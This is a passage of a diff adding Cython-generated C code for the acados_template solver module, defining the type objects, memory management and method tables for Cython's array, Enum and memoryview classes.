0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif +static struct __pyx_vtabstruct_array __pyx_vtable_array; + +static PyObject *__pyx_tp_new_array(PyTypeObject *t, PyObject *a, PyObject *k) { + struct __pyx_array_obj *p; + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + p = ((struct __pyx_array_obj *)o); + p->__pyx_vtab = __pyx_vtabptr_array; + p->mode = ((PyObject*)Py_None); Py_INCREF(Py_None); + p->_format = ((PyObject*)Py_None); Py_INCREF(Py_None); + if (unlikely(__pyx_array___cinit__(o, a, k) < 0)) goto bad; + return o; + bad: + Py_DECREF(o); o = 0; + return NULL; +} + +static void __pyx_tp_dealloc_array(PyObject *o) { + struct __pyx_array_obj *p = (struct __pyx_array_obj *)o; + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && (!PyType_IS_GC(Py_TYPE(o)) || !__Pyx_PyObject_GC_IsFinalized(o))) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_array) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + { + PyObject *etype, *eval, *etb; + PyErr_Fetch(&etype, &eval, &etb); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) + 1); + __pyx_array___dealloc__(o); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) - 1); + PyErr_Restore(etype, eval, etb); + } + Py_CLEAR(p->mode); + Py_CLEAR(p->_format); + (*Py_TYPE(o)->tp_free)(o); +} +static PyObject *__pyx_sq_item_array(PyObject *o, Py_ssize_t i) { + PyObject *r; + PyObject *x = PyInt_FromSsize_t(i); if(!x) return 0; + r = Py_TYPE(o)->tp_as_mapping->mp_subscript(o, x); + Py_DECREF(x); + return r; +} + +static int __pyx_mp_ass_subscript_array(PyObject *o, PyObject *i, PyObject *v) { + if (v) { + return __pyx_array___setitem__(o, i, v); + } + else { + __Pyx_TypeName o_type_name; + o_type_name = __Pyx_PyType_GetName(Py_TYPE(o)); + PyErr_Format(PyExc_NotImplementedError, + "Subscript deletion not supported by " __Pyx_FMT_TYPENAME, o_type_name); + __Pyx_DECREF_TypeName(o_type_name); + return -1; + } +} + +static PyObject *__pyx_tp_getattro_array(PyObject *o, PyObject *n) { + PyObject *v = __Pyx_PyObject_GenericGetAttr(o, n); + if (!v && PyErr_ExceptionMatches(PyExc_AttributeError)) { + PyErr_Clear(); + v = __pyx_array___getattr__(o, n); + } + return v; +} + +static PyObject *__pyx_getprop___pyx_array_memview(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_5array_7memview_1__get__(o); +} + +static PyMethodDef __pyx_methods_array[] = { + {"__getattr__", (PyCFunction)__pyx_array___getattr__, METH_O|METH_COEXIST, 0}, + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_array_1__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_array_3__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; + +static struct PyGetSetDef __pyx_getsets_array[] = { + {(char *)"memview", __pyx_getprop___pyx_array_memview, 0, (char *)0, 0}, + {0, 0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +#if !CYTHON_COMPILING_IN_LIMITED_API + +static PyBufferProcs __pyx_tp_as_buffer_array = { + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getreadbuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getwritebuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getsegcount*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getcharbuffer*/ + #endif + __pyx_array_getbuffer, /*bf_getbuffer*/ + 0, /*bf_releasebuffer*/ +}; +#endif +static PyType_Slot __pyx_type___pyx_array_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_array}, + {Py_sq_length, (void *)__pyx_array___len__}, + {Py_sq_item, (void *)__pyx_sq_item_array}, + {Py_mp_length, (void *)__pyx_array___len__}, + {Py_mp_subscript, (void *)__pyx_array___getitem__}, + {Py_mp_ass_subscript, (void *)__pyx_mp_ass_subscript_array}, + {Py_tp_getattro, (void *)__pyx_tp_getattro_array}, + #if defined(Py_bf_getbuffer) + {Py_bf_getbuffer, (void *)__pyx_array_getbuffer}, + #endif + {Py_tp_methods, (void *)__pyx_methods_array}, + {Py_tp_getset, (void *)__pyx_getsets_array}, + {Py_tp_new, (void *)__pyx_tp_new_array}, + {0, 0}, +}; +static PyType_Spec __pyx_type___pyx_array_spec = { + "acados_template.acados_ocp_solver_pyx.array", + sizeof(struct __pyx_array_obj), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_SEQUENCE, + __pyx_type___pyx_array_slots, +}; +#else + +static PySequenceMethods __pyx_tp_as_sequence_array = { + __pyx_array___len__, /*sq_length*/ + 0, /*sq_concat*/ + 0, /*sq_repeat*/ + __pyx_sq_item_array, /*sq_item*/ + 0, /*sq_slice*/ + 0, /*sq_ass_item*/ + 0, /*sq_ass_slice*/ + 0, /*sq_contains*/ + 0, /*sq_inplace_concat*/ + 0, /*sq_inplace_repeat*/ +}; + +static PyMappingMethods __pyx_tp_as_mapping_array = { + __pyx_array___len__, /*mp_length*/ + __pyx_array___getitem__, /*mp_subscript*/ + __pyx_mp_ass_subscript_array, /*mp_ass_subscript*/ +}; + +static PyBufferProcs __pyx_tp_as_buffer_array = { + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getreadbuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getwritebuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getsegcount*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getcharbuffer*/ + #endif + __pyx_array_getbuffer, /*bf_getbuffer*/ + 0, /*bf_releasebuffer*/ +}; + +static PyTypeObject __pyx_type___pyx_array = { + PyVarObject_HEAD_INIT(0, 0) + "acados_template.acados_ocp_solver_pyx.""array", /*tp_name*/ + sizeof(struct __pyx_array_obj), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_array, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + &__pyx_tp_as_sequence_array, /*tp_as_sequence*/ + &__pyx_tp_as_mapping_array, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + __pyx_tp_getattro_array, /*tp_getattro*/ + 0, /*tp_setattro*/ + &__pyx_tp_as_buffer_array, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_SEQUENCE, /*tp_flags*/ + 0, /*tp_doc*/ + 0, /*tp_traverse*/ + 0, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_array, /*tp_methods*/ + 0, /*tp_members*/ + __pyx_getsets_array, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_array, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif + +static PyObject *__pyx_tp_new_Enum(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { + struct __pyx_MemviewEnum_obj *p; + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + p = ((struct __pyx_MemviewEnum_obj *)o); + p->name = Py_None; Py_INCREF(Py_None); + return o; +} + +static void __pyx_tp_dealloc_Enum(PyObject *o) { + struct __pyx_MemviewEnum_obj *p = (struct __pyx_MemviewEnum_obj *)o; + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_Enum) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + PyObject_GC_UnTrack(o); + Py_CLEAR(p->name); + (*Py_TYPE(o)->tp_free)(o); +} + +static int __pyx_tp_traverse_Enum(PyObject *o, visitproc v, void *a) { + int e; + struct __pyx_MemviewEnum_obj *p = (struct __pyx_MemviewEnum_obj *)o; + if (p->name) { + e = (*v)(p->name, a); if (e) return e; + } + return 0; +} + +static int __pyx_tp_clear_Enum(PyObject *o) { + PyObject* tmp; + struct __pyx_MemviewEnum_obj *p = (struct __pyx_MemviewEnum_obj *)o; + tmp = ((PyObject*)p->name); + p->name = Py_None; Py_INCREF(Py_None); + Py_XDECREF(tmp); + return 0; +} + +static PyObject *__pyx_specialmethod___pyx_MemviewEnum___repr__(PyObject *self, CYTHON_UNUSED PyObject *arg) { + return __pyx_MemviewEnum___repr__(self); +} + +static PyMethodDef __pyx_methods_Enum[] = { + {"__repr__", (PyCFunction)__pyx_specialmethod___pyx_MemviewEnum___repr__, METH_NOARGS|METH_COEXIST, 0}, + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_MemviewEnum_1__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_MemviewEnum_3__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type___pyx_MemviewEnum_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_Enum}, + {Py_tp_repr, (void *)__pyx_MemviewEnum___repr__}, + {Py_tp_traverse, (void *)__pyx_tp_traverse_Enum}, + {Py_tp_clear, (void *)__pyx_tp_clear_Enum}, + {Py_tp_methods, (void *)__pyx_methods_Enum}, + {Py_tp_init, (void *)__pyx_MemviewEnum___init__}, + {Py_tp_new, (void *)__pyx_tp_new_Enum}, + {0, 0}, +}; +static PyType_Spec __pyx_type___pyx_MemviewEnum_spec = { + "acados_template.acados_ocp_solver_pyx.Enum", + sizeof(struct __pyx_MemviewEnum_obj), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC, + __pyx_type___pyx_MemviewEnum_slots, +}; +#else + +static PyTypeObject __pyx_type___pyx_MemviewEnum = { + PyVarObject_HEAD_INIT(0, 0) + "acados_template.acados_ocp_solver_pyx.""Enum", /*tp_name*/ + sizeof(struct __pyx_MemviewEnum_obj), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_Enum, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + __pyx_MemviewEnum___repr__, /*tp_repr*/ + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC, /*tp_flags*/ + 0, /*tp_doc*/ + __pyx_tp_traverse_Enum, /*tp_traverse*/ + __pyx_tp_clear_Enum, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_Enum, /*tp_methods*/ + 0, /*tp_members*/ + 0, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + __pyx_MemviewEnum___init__, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_Enum, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif +static struct __pyx_vtabstruct_memoryview __pyx_vtable_memoryview; + +static PyObject *__pyx_tp_new_memoryview(PyTypeObject *t, PyObject *a, PyObject *k) { + struct __pyx_memoryview_obj *p; + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + p = ((struct __pyx_memoryview_obj *)o); + p->__pyx_vtab = __pyx_vtabptr_memoryview; + p->obj = Py_None; Py_INCREF(Py_None); + p->_size = Py_None; Py_INCREF(Py_None); + p->_array_interface = Py_None; Py_INCREF(Py_None); + p->view.obj = NULL; + if (unlikely(__pyx_memoryview___cinit__(o, a, k) < 0)) goto bad; + return o; + bad: + Py_DECREF(o); o = 0; + return NULL; +} + +static void __pyx_tp_dealloc_memoryview(PyObject *o) { + struct __pyx_memoryview_obj *p = (struct __pyx_memoryview_obj *)o; + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_memoryview) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + PyObject_GC_UnTrack(o); + { + PyObject *etype, *eval, *etb; + PyErr_Fetch(&etype, &eval, &etb); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) + 1); + __pyx_memoryview___dealloc__(o); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) - 1); + PyErr_Restore(etype, eval, etb); + } + Py_CLEAR(p->obj); + Py_CLEAR(p->_size); + Py_CLEAR(p->_array_interface); + (*Py_TYPE(o)->tp_free)(o); +} + +static int __pyx_tp_traverse_memoryview(PyObject *o, visitproc v, void *a) { + int e; + struct __pyx_memoryview_obj *p = (struct __pyx_memoryview_obj *)o; + if (p->obj) { + e = (*v)(p->obj, a); if (e) return e; + } + if (p->_size) { + e = (*v)(p->_size, a); if (e) return e; + } + if (p->_array_interface) { + e = (*v)(p->_array_interface, a); if (e) return e; + } + if (p->view.obj) { + e = (*v)(p->view.obj, a); if (e) return e; + } + return 0; +} + +static int __pyx_tp_clear_memoryview(PyObject *o) { + PyObject* tmp; + struct __pyx_memoryview_obj *p = (struct __pyx_memoryview_obj *)o; + tmp = ((PyObject*)p->obj); + p->obj = Py_None; Py_INCREF(Py_None); + Py_XDECREF(tmp); + tmp = ((PyObject*)p->_size); + p->_size = Py_None; Py_INCREF(Py_None); + Py_XDECREF(tmp); + tmp = ((PyObject*)p->_array_interface); + p->_array_interface = Py_None; Py_INCREF(Py_None); + Py_XDECREF(tmp); + Py_CLEAR(p->view.obj); + return 0; +} +static PyObject *__pyx_sq_item_memoryview(PyObject *o, Py_ssize_t i) { + PyObject *r; + PyObject *x = PyInt_FromSsize_t(i); if(!x) return 0; + r = Py_TYPE(o)->tp_as_mapping->mp_subscript(o, x); + Py_DECREF(x); + return r; +} + +static int __pyx_mp_ass_subscript_memoryview(PyObject *o, PyObject *i, PyObject *v) { + if (v) { + return __pyx_memoryview___setitem__(o, i, v); + } + else { + __Pyx_TypeName o_type_name; + o_type_name = __Pyx_PyType_GetName(Py_TYPE(o)); + PyErr_Format(PyExc_NotImplementedError, + "Subscript deletion not supported by " __Pyx_FMT_TYPENAME, o_type_name); + __Pyx_DECREF_TypeName(o_type_name); + return -1; + } +} + +static PyObject *__pyx_getprop___pyx_memoryview_T(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_1T_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_base(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_4base_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_shape(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_5shape_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_strides(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_7strides_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_suboffsets(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_10suboffsets_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_ndim(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_4ndim_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_itemsize(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_8itemsize_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_nbytes(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_6nbytes_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_size(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_4size_1__get__(o); +} + +static PyObject *__pyx_specialmethod___pyx_memoryview___repr__(PyObject *self, CYTHON_UNUSED PyObject *arg) { + return __pyx_memoryview___repr__(self); +} + +static PyMethodDef __pyx_methods_memoryview[] = { + {"__repr__", (PyCFunction)__pyx_specialmethod___pyx_memoryview___repr__, METH_NOARGS|METH_COEXIST, 0}, + {"is_c_contig", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_memoryview_is_c_contig, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"is_f_contig", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_memoryview_is_f_contig, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"copy", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_memoryview_copy, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"copy_fortran", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_memoryview_copy_fortran, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_memoryview_1__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_memoryview_3__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; + +static struct PyGetSetDef __pyx_getsets_memoryview[] = { + {(char *)"T", __pyx_getprop___pyx_memoryview_T, 0, (char *)0, 0}, + {(char *)"base", __pyx_getprop___pyx_memoryview_base, 0, (char *)0, 0}, + {(char *)"shape", __pyx_getprop___pyx_memoryview_shape, 0, (char *)0, 0}, + {(char *)"strides", __pyx_getprop___pyx_memoryview_strides, 0, (char *)0, 0}, + {(char *)"suboffsets", __pyx_getprop___pyx_memoryview_suboffsets, 0, (char *)0, 0}, + {(char *)"ndim", __pyx_getprop___pyx_memoryview_ndim, 0, (char *)0, 0}, + {(char *)"itemsize", __pyx_getprop___pyx_memoryview_itemsize, 0, (char *)0, 0}, + {(char *)"nbytes", __pyx_getprop___pyx_memoryview_nbytes, 0, (char *)0, 0}, + {(char *)"size", __pyx_getprop___pyx_memoryview_size, 0, (char *)0, 0}, + {0, 0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +#if !CYTHON_COMPILING_IN_LIMITED_API + +static PyBufferProcs __pyx_tp_as_buffer_memoryview = { + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getreadbuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getwritebuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getsegcount*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getcharbuffer*/ + #endif + __pyx_memoryview_getbuffer, /*bf_getbuffer*/ + 0, /*bf_releasebuffer*/ +}; +#endif +static PyType_Slot __pyx_type___pyx_memoryview_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_memoryview}, + {Py_tp_repr, (void *)__pyx_memoryview___repr__}, + {Py_sq_length, (void *)__pyx_memoryview___len__}, + {Py_sq_item, (void *)__pyx_sq_item_memoryview}, + {Py_mp_length, (void *)__pyx_memoryview___len__}, + {Py_mp_subscript, (void *)__pyx_memoryview___getitem__}, + {Py_mp_ass_subscript, (void *)__pyx_mp_ass_subscript_memoryview}, + {Py_tp_str, (void *)__pyx_memoryview___str__}, + #if defined(Py_bf_getbuffer) + {Py_bf_getbuffer, (void *)__pyx_memoryview_getbuffer}, + #endif + {Py_tp_traverse, (void *)__pyx_tp_traverse_memoryview}, + {Py_tp_clear, (void *)__pyx_tp_clear_memoryview}, + {Py_tp_methods, (void *)__pyx_methods_memoryview}, + {Py_tp_getset, (void *)__pyx_getsets_memoryview}, + {Py_tp_new, (void *)__pyx_tp_new_memoryview}, + {0, 0}, +}; +static PyType_Spec __pyx_type___pyx_memoryview_spec = { + "acados_template.acados_ocp_solver_pyx.memoryview", + sizeof(struct __pyx_memoryview_obj), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC, + __pyx_type___pyx_memoryview_slots, +}; +#else + +static PySequenceMethods __pyx_tp_as_sequence_memoryview = { + __pyx_memoryview___len__, /*sq_length*/ + 0, /*sq_concat*/ + 0, /*sq_repeat*/ + __pyx_sq_item_memoryview, /*sq_item*/ + 0, /*sq_slice*/ + 0, /*sq_ass_item*/ + 0, /*sq_ass_slice*/ + 0, /*sq_contains*/ + 0, /*sq_inplace_concat*/ + 0, /*sq_inplace_repeat*/ +}; + +static PyMappingMethods __pyx_tp_as_mapping_memoryview = { + __pyx_memoryview___len__, /*mp_length*/ + __pyx_memoryview___getitem__, /*mp_subscript*/ + __pyx_mp_ass_subscript_memoryview, /*mp_ass_subscript*/ +}; + +static PyBufferProcs __pyx_tp_as_buffer_memoryview = { + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getreadbuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getwritebuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getsegcount*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getcharbuffer*/ + #endif + __pyx_memoryview_getbuffer, /*bf_getbuffer*/ + 0, /*bf_releasebuffer*/ +}; + +static PyTypeObject __pyx_type___pyx_memoryview = { + PyVarObject_HEAD_INIT(0, 0) + "acados_template.acados_ocp_solver_pyx.""memoryview", /*tp_name*/ + sizeof(struct __pyx_memoryview_obj), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_memoryview, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + __pyx_memoryview___repr__, /*tp_repr*/ + 0, /*tp_as_number*/ + &__pyx_tp_as_sequence_memoryview, /*tp_as_sequence*/ + &__pyx_tp_as_mapping_memoryview, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + __pyx_memoryview___str__, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + &__pyx_tp_as_buffer_memoryview, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC, /*tp_flags*/ + 0, /*tp_doc*/ + __pyx_tp_traverse_memoryview, /*tp_traverse*/ + __pyx_tp_clear_memoryview, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, 